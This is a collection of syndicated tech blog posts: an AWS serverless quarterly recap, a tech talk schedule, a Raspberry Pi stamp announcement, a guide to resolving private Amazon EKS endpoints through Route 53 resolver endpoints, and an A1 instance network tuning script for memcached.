
ICYMI: Serverless Q1 2019

Post Syndicated from Eric Johnson original https://aws.amazon.com/blogs/compute/icymi-serverless-q1-2019/

Welcome to the fifth edition of the AWS Serverless ICYMI (in case you missed it) quarterly recap. Every quarter, we share all of the most recent product launches, feature enhancements, blog posts, webinars, Twitch live streams, and other interesting things that you might have missed!

If you didn’t see them, check our previous posts for what happened in 2018:

So, what might you have missed this past quarter? Here’s the recap.

Amazon API Gateway

Amazon API Gateway improved the experience for publishing APIs on the API Gateway Developer Portal. In addition, we added a search capability, a feedback mechanism, and SDK generation.

Last year, API Gateway announced support for WebSockets. As of early February 2019, it is now possible to build WebSocket-enabled APIs via AWS CloudFormation and AWS Serverless Application Model (AWS SAM). The following diagram shows an example application.
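
If you just want to experiment with a WebSocket API from the command line before encoding it in a CloudFormation or AWS SAM template, a minimal sketch looks like the following (the API name and route selection expression are placeholder values):

# Create a WebSocket API for experimentation; the name and route selection
# expression below are examples only
aws apigatewayv2 create-api \
  --name my-websocket-api \
  --protocol-type WEBSOCKET \
  --route-selection-expression '$request.body.action'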

API Gateway is also now supported in AWS Config. This feature enhancement allows API administrators to track changes to their API configuration automatically. With the power of AWS Config, you can automate alerts—and even remediation—with triggered Lambda functions.

In early January, API Gateway also announced a service level agreement (SLA) of 99.95% availability.

AWS Step Functions


AWS Step Functions added the ability to tag Step Function resources and provide access control with tag-based permissions. With this feature, developers can use tags to define access via AWS Identity and Access Management (IAM) policies.
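
For example, tagging an existing state machine takes a single CLI call; the state machine ARN and tag values below are placeholders, and IAM policies can then allow or deny access based on the tag:

# Tag a state machine (ARN and tag values are placeholders)
aws stepfunctions tag-resource \
  --resource-arn arn:aws:states:us-east-1:123456789012:stateMachine:OrderProcessing \
  --tags key=team,value=payments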

In addition to tag-based permissions, Step Functions was one of 10 additional services to gain support for the Resource Group Tagging API, which provides a single, central point of administration for tags on resources.

In early February, Step Functions released the ability to develop and test applications locally using a Docker container, letting you iterate faster without deploying to AWS.
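
As a rough sketch, running the published container and pointing the AWS CLI at it looks like this (port 8083 is the image's default listener):

# Start Step Functions Local in Docker (listens on port 8083)
docker run -p 8083:8083 amazon/aws-stepfunctions-local

# In another shell, direct AWS CLI calls at the local endpoint
aws stepfunctions list-state-machines --endpoint-url http://localhost:8083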

In late January, Step Functions joined the family of services offering SLAs with an SLA of 99.9% availability. They also increased their service footprint to include the AWS China (Ningxia) and AWS China (Beijing) Regions.

AWS SAM Command Line Interface

AWS SAM Command Line Interface (AWS SAM CLI) released the AWS Toolkit for Visual Studio Code and the AWS Toolkit for IntelliJ. These toolkits are open source plugins that make it easier to develop applications on AWS. The toolkits provide an integrated experience for developing serverless applications in Node.js (Visual Studio Code) as well as Java and Python (IntelliJ), with more languages and features to come.

The toolkits help you get started fast with built-in project templates that leverage AWS SAM to define and configure resources. They also include an integrated experience for step-through debugging of serverless applications and make it easy to deploy your applications from the integrated development environment (IDE).
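
Under the hood, the same AWS SAM CLI workflow is available from a terminal; here is a hedged sketch in which the project name and runtime are just examples:

# Scaffold a new project from a quick-start template (name and runtime are examples)
sam init --runtime nodejs8.10 --name my-sam-app
cd my-sam-app

# Build the application and invoke a function locally
sam build
sam local invoke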

AWS Serverless Application Repository

AWS Serverless Application Repository applications can now be published to the application repository using AWS CodePipeline. This allows you to update applications in the AWS Serverless Application Repository with a continuous integration and continuous delivery (CICD) process. The CICD process is powered by a pre-built application that publishes other applications to the AWS Serverless Application Repository.

AWS Event Fork Pipelines


AWS Event Fork Pipelines is now available in AWS Serverless Application Repository. AWS Event Fork Pipelines is a suite of nested open-source applications based on AWS SAM. You can deploy Event Fork Pipelines directly from AWS Serverless Application Repository into your AWS account. These applications help you build event-driven serverless applications by providing pipelines for common event-handling requirements.
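
If you prefer to script the deployment, the Serverless Application Repository API can create a CloudFormation change set for you; in this sketch, the application ARN and stack name are placeholders:

# Create a change set from a Serverless Application Repository application
# (application ARN and stack name are placeholders), then execute it with
# the usual CloudFormation commands
aws serverlessrepo create-cloud-formation-change-set \
  --application-id <event-fork-pipeline-application-arn> \
  --stack-name my-event-fork-pipeline \
  --capabilities CAPABILITY_IAM CAPABILITY_AUTO_EXPAND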

AWS Cloud9


AWS Cloud9 announced that, in addition to Amazon Linux, you can now select Ubuntu as the operating system for your AWS Cloud9 environment. Before this announcement, you had to stand up an Ubuntu server and connect AWS Cloud9 to the instance by using SSH. With native support for Ubuntu, you can take advantage of AWS Cloud9 features, such as instance lifecycle management for cost efficiency and preconfigured tooling environments.

AWS Cloud9 also added support for AWS CloudTrail, which allows you to monitor and react to changes made to your AWS Cloud9 environment.

Amazon Kinesis Data Analytics

Amazon Kinesis Data Analytics now supports CloudTrail logging. CloudTrail captures changes made to Kinesis Data Analytics and delivers the logs to an Amazon S3 bucket. This makes it easy for administrators to understand changes made to the application and who made them.

Amazon DynamoDB

Amazon DynamoDB removed the DynamoDB Streams costs associated with replicating data globally. Because global tables use streams to replicate data between Regions, this translates to cost savings for global tables. However, DynamoDB streaming costs remain the same for your applications reading from a replica table's stream.

DynamoDB added the ability to switch encryption keys used to encrypt data. DynamoDB, by default, encrypts all data at rest. You can use the default encryption, the AWS-owned customer master key (CMK), or the AWS managed CMK to encrypt data. It is now possible to change between the AWS-owned CMK and the AWS managed CMK without having to modify code or applications.
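
As a hedged example, switching an existing table to the AWS managed CMK from the CLI looks roughly like this (the table name is a placeholder):

# Switch a table's encryption to the AWS managed CMK (table name is a placeholder)
aws dynamodb update-table \
  --table-name MyTable \
  --sse-specification Enabled=true,SSEType=KMS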

Amazon DynamoDB Local, a local installable version of DynamoDB, has added support for transactional APIs, on-demand capacity, and as many as 20 global secondary indexes per table.
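
A quick way to try these features is the published DynamoDB Local Docker image; the table definition below is only an example:

# Run DynamoDB Local in a container (listens on port 8000)
docker run -p 8000:8000 amazon/dynamodb-local

# Create an on-demand table against the local endpoint (name and schema are examples)
aws dynamodb create-table \
  --table-name LocalTest \
  --attribute-definitions AttributeName=pk,AttributeType=S \
  --key-schema AttributeName=pk,KeyType=HASH \
  --billing-mode PAY_PER_REQUEST \
  --endpoint-url http://localhost:8000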

AWS Amplify


AWS Amplify added support for OAuth 2.0 Authorization Code Grant flows in the native (iOS and Android) and React Native libraries. Previously, you would have to use third-party libraries and handwritten logic to achieve these use cases.

Additionally, Amplify also launched the ability to perform instant cache invalidation and delta deployments on every code commit. To achieve this, Amplify creates unique references to all the build artifacts on each deploy. Amplify has also added the ability to detect and upload only modified artifacts at the time of release to help reduce deployment time.

Amplify also added features for multiple environments, custom resolvers, larger data models, and IAM roles, including multi-factor authentication (MFA).

AWS AppSync

AWS AppSync increased its availability footprint to the EU (London) Region.

Amazon Cognito

Amazon Cognito increased its service footprint to include the Canada (Central) Region. It also published an SLA of 99.9% availability.

Amazon Aurora

Amazon Aurora Serverless increases performance visibility by publishing logs to Amazon CloudWatch.

AWS CodePipeline


AWS CodePipeline announced support for deploying static files to Amazon S3. While this may not usually fall under serverless blogs and announcements, if you're a developer who builds single-page applications or hosts static websites, this makes your life easier. Your static site can now be part of your CICD process without custom coding.

Serverless Posts

January:

February:

March:

Tech talks

We hold several AWS Online Tech Talks covering serverless topics throughout the year, so look out for them in the Serverless section of the AWS Online Tech Talks page. Here are the three tech talks that we delivered in Q1:

Whitepapers

Security Overview of AWS Lambda: This whitepaper presents a deep dive into the Lambda service through a security lens. It provides a well-rounded picture of the service that can be useful for new adopters and can deepen current users' understanding of Lambda. Read the full whitepaper.

Twitch


There is always something going on at our Twitch channel! Be sure to follow us so you don't miss anything! For information about upcoming broadcasts and recent live streams, keep an eye on AWS on Twitch for more serverless videos and on the Join us on Twitch AWS page.

In other news


Twitch Series: Building Happy Little APIs

In April, we started a 13-week deep dive into building APIs on AWS as part of our Twitch Build On series. The Building Happy Little APIs series covers the common and not-so-common use cases for APIs on AWS and the features available to customers as they look to build secure, scalable, efficient, and flexible APIs.

Twitch series: Build on Serverless: Season 2


Join Heitor Lessa across 14 weeks, nearly every Wednesday from April 24 – August 7 at 8AM PST/11AM EST/3PM UTC. Heitor is live-building a full-stack, serverless airline-booking application using a bunch of services: Lambda, Amplify, API Gateway, Amazon Cognito, AWS SAM, CloudWatch, AWS AppSync, and others. See the episode guide and sign up for stream reminders.

2019 AWS Summits


The schedule is in full swing for the 2019 AWS Global Summits held in major cities around the world. These free events bring the cloud computing community together to connect, collaborate, and learn about AWS. They attract technologists from all industries and skill levels who want to discover how AWS can help them innovate quickly and deliver flexible, reliable solutions at scale. Get notified when to register and learn more at the AWS Global Summit Program website.

Still looking for more?

The Serverless landing page has lots of information. The Lambda resources page contains case studies, webinars, whitepapers, customer stories, reference architectures, and even more Getting Started tutorials. Check it out!

Learn about AWS Services & Solutions – May AWS Online Tech Talks

Post Syndicated from Robin Park original https://aws.amazon.com/blogs/aws/learn-about-aws-services-solutions-may-aws-online-tech-talks/


Join us this May to learn about AWS services and solutions. The AWS Online Tech Talks are live, online presentations that cover a broad range of topics at varying technical levels. These tech talks, led by AWS solutions architects and engineers, feature technical deep dives, live demonstrations, customer examples, and Q&A with AWS experts. Register Now!

Note – All sessions are free and in Pacific Time.

Tech talks this month:

Compute

May 30, 2019 | 11:00 AM – 12:00 PM PT – Your First HPC Cluster on AWS – Get a step-by-step walk-through of how to set up your first HPC cluster on AWS.

Containers

May 20, 2019 | 11:00 AM – 12:00 PM PT – Managing Application Deployments with the AWS Service Operator – Learn how the AWS Service Operator helps you provision AWS resources and your applications using the kubectl CLI.

May 22, 2019 | 9:00 AM – 10:00 AM PT – Microservice Deployment Strategies with AWS App Mesh – Learn how AWS App Mesh makes the process of deploying microservices on AWS easier and more reliable while providing you with greater control and visibility to support common deployment patterns.

Data Lakes & Analytics

May 20, 2019 | 9:00 AM – 10:00 AM PT – EKK is the New ELK: Aggregating, Analyzing and Visualizing Logs – Learn how to aggregate, analyze, and visualize your logs with Amazon Elasticsearch Service, Amazon Kinesis Data Firehose, and Kibana.

May 22, 2019 | 11:00 AM – 12:00 PM PT – Building a Data Streaming Application Leveraging Apache Flink – Learn how to build and manage a real-time streaming application on AWS using Java and Apache Flink.

Databases

May 20, 2019 | 1:00 PM – 2:00 PM PT – Migrating to Amazon DocumentDB – Learn how to migrate MongoDB workloads to Amazon DocumentDB, a fully managed MongoDB-compatible database service designed from the ground up to be fast, scalable, and highly available.

May 29, 2019 | 1:00 PM – 2:00 PM PT – AWS Fireside Chat: Optimize Your Business Continuity Strategy with Aurora Global Database – Join us for a discussion with the General Manager of Amazon Aurora to learn how you can use Aurora Global Database to build scalable and reliable apps.

DevOps

May 21, 2019 | 9:00 AM – 10:00 AM PT – Infrastructure as Code Testing Strategies with AWS CloudFormation – Learn about CloudFormation testing best practices, including what tools to use and when, both while authoring code and while testing in a continuous integration and continuous delivery pipeline.

End-User Computing

May 23, 2019 | 1:00 PM – 2:00 PM PT – Managing Amazon Linux WorkSpaces at Scale using AWS OpsWorks for Chef Automate – Learn how to simplify your Amazon Linux WorkSpaces management at scale by integrating with AWS OpsWorks for Chef Automate.

Enterprise & Hybrid

May 28, 2019 | 11:00 AM – 12:00 PM PT – What’s New in AWS Landing Zone – Learn how the AWS Landing Zone can automate the setup of best practice baselines when setting up new AWS environments.

IoT

May 29, 2019 | 11:00 AM – 12:30 PM PT – Customer Showcase: Extending Machine Learning to Industrial IoT Applications at the Edge – Learn how AWS IoT customers are building smarter products and bringing them to market quickly with Amazon FreeRTOS and AWS IoT Greengrass.

Machine Learning

May 28, 2019 | 9:00 AM – 10:00 AM PT – Build a Scalable Architecture to Automatically Extract and Import Form Data – Learn how to build a scalable architecture to process thousands of forms or documents with Amazon Textract.

May 30, 2019 | 1:00 PM – 2:00 PM PT – Build Efficient and Accurate Recommendation Engines with Amazon Personalize – Learn how to build efficient and accurate recommendation engines with high impact to the bottom line of your business.

Mobile

May 21, 2019 | 1:00 PM – 2:00 PM PT – Deploying and Consuming Serverless Functions with AWS Amplify – Learn how to build and deploy serverless applications using React and AWS Amplify.

Networking & Content Delivery

May 31, 2019 | 1:00 PM – 2:00 PM PT – Simplify and Scale How You Connect Your Premises to AWS with AWS Direct Connect on AWS Transit Gateway – Learn how to use a multi-account Direct Connect gateway to interface your on-premises network with your AWS network through an AWS Transit Gateway.

Security, Identity, & Compliance

May 30, 2019 | 9:00 AM – 10:00 AM PT – Getting Started with Cross-Account Encryption Using AWS KMS, Featuring Slack Enterprise Key Management – Learn how to manage third-party access to your data keys with AWS KMS.

May 31, 2019 | 9:00 AM – 10:00 AM PT – Authentication for Your Applications: Getting Started with Amazon Cognito – Learn how to use Amazon Cognito to add sign-up and sign-in to your web or mobile application.

Serverless

May 22, 2019 | 1:00 PM – 2:00 PM PT – Building Event-Driven Serverless Apps with AWS Event Fork Pipelines – Learn how to use Event Fork Pipelines, a new suite of open-source nested applications in the AWS Serverless Application Repository, to easily build event-driven apps.

Storage

May 28, 2019 | 1:00 PM – 2:00 PM PT – Briefing: AWS Hybrid Cloud Storage and Edge Computing – Learn about AWS hybrid cloud storage and edge computing capabilities.

May 23, 2019 | 11:00 AM – 12:00 PM PT – Managing Tens to Billions of Objects at Scale with S3 Batch Operations – Learn about S3 Batch Operations and how to manage billions of objects with a single API request in a few clicks.

We’re on a stamp!

Post Syndicated from Liz Upton original https://www.raspberrypi.org/blog/were-on-a-stamp/

The Royal Mail is issuing a series of six stamps celebrating 50 years of British Engineering this week (available from 2 May). We’re absolutely made up to be one of the engineering projects chosen: we’re in some exalted company.

This series is also celebrating the 50th anniversary of the Royal Academy of Engineering’s MacRobert Award, which Raspberry Pi won in 2017. (I had had a baby what felt like about five minutes before the photos from the MacRobert Award presentation ceremony were taken, so please don’t judge.) The Raspberry Pi stamp sits alongside stamps featuring the Falkirk Wheel, catalytic converters, Crossrail, CT scanners, and synthetic bone grafts. We don’t envy the people having to make the choices about what to put on stamps like this: how do you sift through fifty years of great engineering in a country like Great Britain that produces so much to admire? We’re very proud to have been included — and we’re buying a huge stack of them to use on all our post for the foreseeable future.

You can buy your own presentation pack at the Royal Mail website (or at Post Offices) from Wednesday 2 May; or you can pre-order now. We’re a little sad that British stamps now come with a sticky back, so we won’t be able to imagine all of you gently licking the back of a Raspberry Pi, but otherwise we’re absolutely made up.


Enabling DNS resolution for Amazon EKS cluster endpoints

Post Syndicated from Anuneet Kumar original https://aws.amazon.com/blogs/compute/enabling-dns-resolution-for-amazon-eks-cluster-endpoints/

This post is contributed by Jeremy Cowan – Sr. Container Specialist Solution Architect, AWS

By default, when you create an Amazon EKS cluster, the Kubernetes cluster endpoint is public. While it is accessible from the internet, access to the Kubernetes cluster endpoint is restricted by AWS Identity and Access Management (IAM) and Kubernetes role-based access control (RBAC) policies.

At some point, you may need to configure the Kubernetes cluster endpoint to be private.  Changing your Kubernetes cluster endpoint access from public to private completely disables public access such that it can no longer be accessed from the internet.

In fact, a cluster that has been configured to only allow private access can only be accessed from the following:

  • The VPC where the worker nodes reside
  • Networks that have been peered with that VPC
  • A network that has been connected to AWS through AWS Direct Connect (DX) or a virtual private network (VPN)

However, the name of the Kubernetes cluster endpoint is only resolvable from the worker node VPC, for the following reasons:

  • The Amazon Route 53 private hosted zone that is created for the endpoint is only associated with the worker node VPC.
  • The private hosted zone is created in a separate AWS managed account and cannot be altered.

For more information, see Working with Private Hosted Zones.

This post explains how to use Route 53 inbound and outbound endpoints to resolve the name of the cluster endpoints when a request originates outside the worker node VPC.

Route 53 inbound and outbound endpoints

Route 53 inbound and outbound endpoints allow you to simplify the configuration of hybrid DNS.  DNS queries for AWS resources are resolved by Route 53 resolvers and DNS queries for on-premises resources are forwarded to an on-premises DNS resolver. However, you can also use these Route 53 endpoints to resolve the names of endpoints that are only resolvable from within a specific VPC, like the EKS cluster endpoint.

The following diagrams show how the solution works:

  • A Route 53 inbound endpoint is created in each worker node VPC and associated with a security group that allows inbound DNS requests from external subnets/CIDR ranges.
  • If the requests for the Kubernetes cluster endpoint originate from a peered VPC, those requests must be routed through a Route 53 outbound endpoint.
  • The outbound endpoint, like the inbound endpoint, is associated with a security group that allows inbound requests that originate from the peered VPC or from other VPCs in the Region.
  • A forwarding rule is created for each Kubernetes cluster endpoint.  This rule routes the request through the outbound endpoint to the IP addresses of the inbound endpoints in the worker node VPC, where it is resolved by Route 53.
  • The results of the DNS query for the Kubernetes cluster endpoint are then returned to the requestor.

If the request originates from an on-premises environment, you forego creating the outbound endpoints. Instead, you create a forwarding rule to forward requests for the Kubernetes cluster endpoint to the IP address of the Route 53 inbound endpoints in the worker node VPC.

Solution overview

For this solution, follow these steps:

  • Create an inbound endpoint in the worker node VPC.
  • Create an outbound endpoint in a peered VPC.
  • Create a forwarding rule for the outbound endpoint that sends requests to the Route 53 resolver for the worker node VPC.
  • Create a security group rule to allow inbound traffic from a peered network.
  • (Optional) Create a forwarding rule in your on-premises DNS for the Kubernetes cluster endpoint.

Prerequisites

EKS requires that you enable DNS hostnames and DNS resolution in each worker node VPC when you change the cluster endpoint access from public to private.  It is also a prerequisite for this solution and for all solutions that use Route 53 private hosted zones.

In addition, you need a route that connects your on-premises network or VPC with the worker node VPC.  In a multi-VPC environment, this can be accomplished by creating a peering connection between two or more VPCs and updating the route table in those VPCs. If you’re connecting from an on-premises environment across a DX or an IPsec VPN, you need a route to the worker node VPC.

Configuring the inbound endpoint

When you provision an EKS cluster, EKS automatically provisions two or more cross-account elastic network interfaces onto two different subnets in your worker node VPC.  These network interfaces are primarily used when the control plane must initiate a connection with your worker nodes, for example, when you use kubectl exec or kubectl proxy. However, they can also be used by the workers to communicate with the Kubernetes API server.

When you change the EKS endpoint access to private, EKS associates a Route 53 private hosted zone with your worker node VPC.  Within this private hosted zone, EKS creates resource records for the cluster endpoint. These records correspond to the IP addresses of the two cross-account elastic network interfaces that were created in your VPC when you provisioned your cluster.

When the IP addresses of these cross-account elastic network interfaces change, for example, when EKS replaces unhealthy control plane nodes, the resource records for the cluster endpoint are automatically updated. This allows your worker nodes to continue communicating with the cluster endpoint when you switch to private access.  If you update the cluster to enable public access and disable private access, your worker nodes revert to using the public Kubernetes cluster endpoint.

A Route 53 inbound endpoint in the worker node VPC forwards incoming DNS queries to that VPC's DNS resolver, which is capable of resolving the cluster endpoint.

Create an inbound endpoint in the worker node VPC

  1. In the Route 53 console, choose Inbound endpoints, Create Inbound endpoint.
  2. For Endpoint Name, enter a value such as <cluster_name>InboundEndpoint.
  3. For VPC in the Region, choose the VPC ID of the worker node VPC.
  4. For Security group for this endpoint, choose a security group that allows clients or applications from other networks to access this endpoint. For an example, see the Route 53 resolver diagram shown earlier in the post.
  5. Under the IP addresses section, choose an Availability Zone that corresponds to a subnet in your VPC.
  6. For IP address, choose Use an IP address that is selected automatically.
  7. Repeat steps 5 and 6 for the second IP address.
  8. Choose Submit.

Or, run the following AWS CLI command:

export DATE=$(date +%s)
export INBOUND_RESOLVER_ID=$(aws route53resolver create-resolver-endpoint --name <name> \
--direction INBOUND --creator-request-id $DATE --security-group-ids <sgs> \
--ip-addresses SubnetId=<subnetId>,Ip=<IP address> SubnetId=<subnetId>,Ip=<IP address> \
| jq -r .ResolverEndpoint.Id)
aws route53resolver list-resolver-endpoint-ip-addresses --resolver-endpoint-id \
$INBOUND_RESOLVER_ID | jq .IpAddresses[].Ip

This outputs the IP addresses assigned to the inbound endpoint.

When you are done creating the inbound endpoint, select the endpoint from the console and choose View details.  This shows you a summary of the configuration for the endpoint.  Record the two IP addresses that were assigned to the inbound endpoint, as you need them later when configuring the forwarding rule.

Connecting from a peered VPC

An outbound endpoint is used to send DNS requests that cannot be resolved “locally” to an external resolver based on a set of rules.

If you are connecting to the EKS cluster from a peered VPC, create an outbound endpoint and forwarding rule in that VPC or expose an outbound endpoint from another VPC. For more information, see Forwarding Outbound DNS Queries to Your Network.

Create an outbound endpoint

  1. In the Route 53 console, choose Outbound endpoints, Create outbound endpoint.
  2. For Endpoint name, enter a value such as <cluster_name>OutboundEndpoint.
  3. For VPC in the Region, select the VPC ID of the VPC where you want to create the outbound endpoint, for example the peered VPC.
  4. For Security group for this endpoint, choose a security group that allows clients and applications from this or other network VPCs to access this endpoint. For an example, see the Route 53 resolver diagram shown earlier in the post.
  5. Under the IP addresses section, choose an Availability Zone that corresponds to a subnet in the peered VPC.
  6. For IP address, choose Use an IP address that is selected automatically.
  7. Repeat steps 5 and 6 for the second IP address.
  8. Choose Submit.

Or, run the following AWS CLI command:

export DATE=$(date +%s)
export OUTBOUND_RESOLVER_ID=$(aws route53resolver create-resolver-endpoint --name <name> \
--direction OUTBOUND --creator-request-id $DATE --security-group-ids <sgs> \
--ip-addresses SubnetId=<subnetId>,Ip=<IP address> SubnetId=<subnetId>,Ip=<IP address> \
| jq -r .ResolverEndpoint.Id)
aws route53resolver list-resolver-endpoint-ip-addresses --resolver-endpoint-id \
$OUTBOUND_RESOLVER_ID | jq .IpAddresses[].Ip

This outputs the IP addresses that get assigned to the outbound endpoint.

Create a forwarding rule for the cluster endpoint

A forwarding rule is used to send DNS requests that cannot be resolved by the local resolver to another DNS resolver.  For this solution to work, create a forwarding rule for each cluster endpoint to resolve through the outbound endpoint. For more information, see Values That You Specify When You Create or Edit Rules.

  1. In the Route 53 console, choose Rules, Create rule.
  2. Give your rule a name, such as <cluster_name>Rule.
  3. For Rule type, choose Forward.
  4. For Domain name, type the name of the cluster endpoint for your EKS cluster.
  5. For VPCs that use this rule, select all of the VPCs to which this rule should apply.  If you have multiple VPCs that must access the cluster endpoint, include them in the list of VPCs.
  6. For Outbound endpoint, select the outbound endpoint to use to send DNS requests to the inbound endpoint of the worker node VPC.
  7. Under the Target IP addresses section, enter the IP addresses of the inbound endpoint that corresponds to the EKS endpoint that you entered in the Domain name field.
  8. Choose Submit.

Or, run the following AWS CLI command:

export DATE=$(date +%s)
aws route53resolver create-resolver-rule --name <name> --rule-type FORWARD \
--creator-request-id $DATE --domain-name <cluster_endpoint> --target-ips \
Ip=<inbound endpoint IP #1>,Port=53 Ip=<inbound endpoint IP #2>,Port=53 --resolver-endpoint-id <Id of outbound endpoint>

Accessing the cluster endpoint

After creating the inbound and outbound endpoints and the DNS forwarding rule, you should be able to resolve the name of the cluster endpoints from the peered VPC.

$ dig 9FF86DB0668DC670F27F426024E7CDBD.sk1.us-east-1.eks.amazonaws.com 

; <<>> DiG 9.8.2rc1-RedHat-9.8.2-0.68.rc1.58.amzn1 <<>> 9FF86DB0668DC670F27F426024E7CDBD.sk1.us-east-1.eks.amazonaws.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 7168
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;9FF86DB0668DC670F27F426024E7CDBD.sk1.us-east-1.eks.amazonaws.com. IN A
;; ANSWER SECTION:
9FF86DB0668DC670F27F426024E7CDBD.sk1.us-east-1.eks.amazonaws.com. 60 IN A 192.168.109.77
9FF86DB0668DC670F27F426024E7CDBD.sk1.us-east-1.eks.amazonaws.com. 60 IN A 192.168.74.42
;; Query time: 12 msec
;; SERVER: 172.16.0.2#53(172.16.0.2)
;; WHEN: Mon Apr 8 22:39:05 2019
;; MSG SIZE rcvd: 114

Before you can access the cluster endpoint, you must add the IP address range of the peered VPCs to the EKS control plane security group. For more information, see Tutorial: Creating a VPC with Public and Private Subnets for Your Amazon EKS Cluster.

Add a rule to the EKS cluster control plane security group

  1. In the EC2 console, choose Security Groups.
  2. Find the security group associated with the EKS cluster control plane.  If you used eksctl to provision your cluster, the security group is named as follows: eksctl-<cluster_name>-cluster/ControlPlaneSecurityGroup.
  3. Add a rule that allows port 443 inbound from the CIDR range of the peered VPC (a CLI sketch follows this list).
  4. Choose Save.
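
If you prefer the CLI, the equivalent call is shown below; the security group ID and CIDR range are placeholders:

# Allow HTTPS (port 443) from the peered VPC's CIDR range to the control plane
# security group (group ID and CIDR are placeholders)
aws ec2 authorize-security-group-ingress \
  --group-id sg-0123456789abcdef0 \
  --protocol tcp \
  --port 443 \
  --cidr 10.1.0.0/16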

Run kubectl

With the proper security group rule in place, you should now be able to issue kubectl commands from a machine in the peered VPC against the cluster endpoint.

$ kubectl get nodes
NAME                             STATUS    ROLES     AGE       VERSION
ip-192-168-18-187.ec2.internal   Ready     <none>    22d       v1.11.5
ip-192-168-61-233.ec2.internal   Ready     <none>    22d       v1.11.5

Connecting from an on-premises environment

To manage your EKS cluster from your on-premises environment, configure a forwarding rule in your on-premises DNS to forward DNS queries to the inbound endpoint of the worker node VPCs. I’ve provided brief descriptions for how to do this for BIND, dnsmasq, and Windows DNS below.

Create a forwarding zone in BIND for the cluster endpoint

Add the following to the BIND configuration file:

zone "<cluster endpoint FQDN>" {
    type forward;
    forwarders { <inbound endpoint IP #1>; <inbound endpoint IP #2>; };
};

Create a forwarding zone in dnsmasq for the cluster endpoint

If you’re using dnsmasq, add the --server=/<cluster endpoint FQDN>/<inbound endpoint IP> flag to the startup options.

Create a forwarding zone in Windows DNS for the cluster endpoint

If you’re using Windows DNS, create a conditional forwarder.  Use the cluster endpoint FQDN for the DNS domain and the IPs of the inbound endpoints for the IP addresses of the servers to which to forward the requests.

Add a security group rule to the cluster control plane

Follow the steps in Adding A Rule To The EKS Cluster Control Plane Security Group. This time, use the CIDR of your on-premises network instead of the peered VPC.

Conclusion

When you configure the EKS cluster endpoint to be private only, its name can only be resolved from the worker node VPC. To manage the cluster from another VPC or your on-premises network, you can use the solution outlined in this post to create an inbound resolver for the worker node VPC.

This inbound endpoint is a feature that allows your DNS resolvers to easily resolve domain names for AWS resources. That includes the private hosted zone that gets associated with your VPC when you make the EKS cluster endpoint private. For more information, see Resolving DNS Queries Between VPCs and Your Network.  As always, I welcome your feedback about this solution.

Optimizing Network Intensive Workloads on Amazon EC2 A1 Instances

Post Syndicated from Martin Yip original https://aws.amazon.com/blogs/compute/optimizing-network-intensive-workloads-on-amazon-ec2-a1-instances/

This post courtesy of Ali Saidi, AWS, Principal Engineer

At re:Invent 2018, AWS announced the Amazon EC2 A1 instance. The A1 instances are powered by our internally developed Arm-based AWS Graviton processors and are up to 45% less expensive than other instance types with the same number of vCPUs and DRAM. These instances are based on the AWS Nitro System and offer enhanced networking of up to 10 Gbps with Elastic Network Adapters (ENA).

One of the use cases for the A1 instance is key-value stores, and in this post, we describe how to get the most performance from the A1 instance running memcached. Some simple configuration options increase the performance of memcached by 3.9X over the out-of-the-box experience, as we'll show below. Although we focus on memcached, the configuration advice is similar for any network intensive workload running on A1 instances. Typically, the performance of network intensive workloads improves by tuning some of these parameters; however, depending on the particular data rates and processing requirements, the optimal values could differ.

irqbalance

Most Linux distributions enable irqbalance by default, which load-balances interrupts across CPUs at runtime. It does a good job of balancing interrupt load, but in some cases we can do better by pinning interrupts to specific CPUs. For our optimizations, we temporarily disable irqbalance; however, if this is a production configuration that needs to survive a server reboot, irqbalance must be permanently disabled and the changes below added to the boot sequence.

Receive Packet Steering (RPS)

RPS controls which CPUs process packets received by the Linux networking stack (softIRQs). Depending on instance size and the amount of application processing needed per packet, sometimes the optimal configuration is to have the core receiving packets also execute the Linux networking stack; other times it's better to spread the processing among a set of cores. For memcached on EC2 A1 instances, we found that using RPS to spread the load out is helpful on the larger instance sizes.

Networking Queues

A1 instances with medium, large, and xlarge instance sizes have a single queue to send and receive packets, while 2xlarge and 4xlarge instance sizes have two queues. On the single-queue instance sizes, we pin the IRQ to core 0, while on the dual-queue sizes we use either core 0 for both queues or core 0 and core 8.

Instance Type   IRQ settings         RPS settings         Application settings
a1.xlarge       Core 0               Core 0               Run on cores 1-3
a1.2xlarge      Both on core 0       Cores 0-3, 4-7       Run on cores 1-7
a1.4xlarge      Core 0 and core 8    Cores 0-7, 8-15      Run on cores 1-7 and 9-15

The following script sets up the Linux kernel parameters:

#!/bin/bash

# Stop irqbalance so that the manual IRQ affinity settings below stick
sudo systemctl stop irqbalance.service

# Pin each eth0 IRQ to the core given by the corresponding positional argument
set_irq_affinity() {
  grep eth0 /proc/interrupts | awk '{print $1}' | tr -d : | while read IRQ;
do
    sudo sh -c "echo $1 > /proc/irq/$IRQ/smp_affinity_list"
    shift
  done
}

# Select RPS masks and IRQ affinity based on the number of cores (instance size)
case `grep ^processor /proc/cpuinfo  | wc -l ` in
  (4)  # a1.xlarge: single queue, RPS on core 0
      sudo sh -c 'echo 1 > /sys/class/net/eth0/queues/rx-0/rps_cpus'
      set_irq_affinity 0
      ;;
  (8)  # a1.2xlarge: two queues, RPS on cores 0-3 and 4-7
      sudo sh -c 'echo f > /sys/class/net/eth0/queues/rx-0/rps_cpus'
      sudo sh -c 'echo f0 > /sys/class/net/eth0/queues/rx-1/rps_cpus'
      set_irq_affinity 0 0
      ;;
  (16) # a1.4xlarge: two queues, RPS on cores 0-7 and 8-15
      sudo sh -c 'echo ff > /sys/class/net/eth0/queues/rx-0/rps_cpus'
      sudo sh -c 'echo ff00 > /sys/class/net/eth0/queues/rx-1/rps_cpus'
      set_irq_affinity 0 08
      ;;
  *)  echo "Script only supports 4, 8, 16 cores on A1 instances"
      exit 1
      ;;
esac

Summary

Some simple tuning parameters can significantly improve the performance of network intensive workloads on the A1 instance. With these changes we get 3.9X the performance on an a1.4xlarge and the other two instance sizes see similar improvements. While the particular values listed here aren’t applicable to all network intensive benchmarks, this article demonstrates the methodology and provides a starting point to tune the system and balance the load across CPUs to improve performance. If you have questions about your own workload running on A1 instances, please don’t hesitate to get in touch with us at [email protected] .

Using partition placement groups for large distributed and replicated workloads in Amazon EC2

Post Syndicated from Roshni Pary original https://aws.amazon.com/blogs/compute/using-partition-placement-groups-for-large-distributed-and-replicated-workloads-in-amazon-ec2/

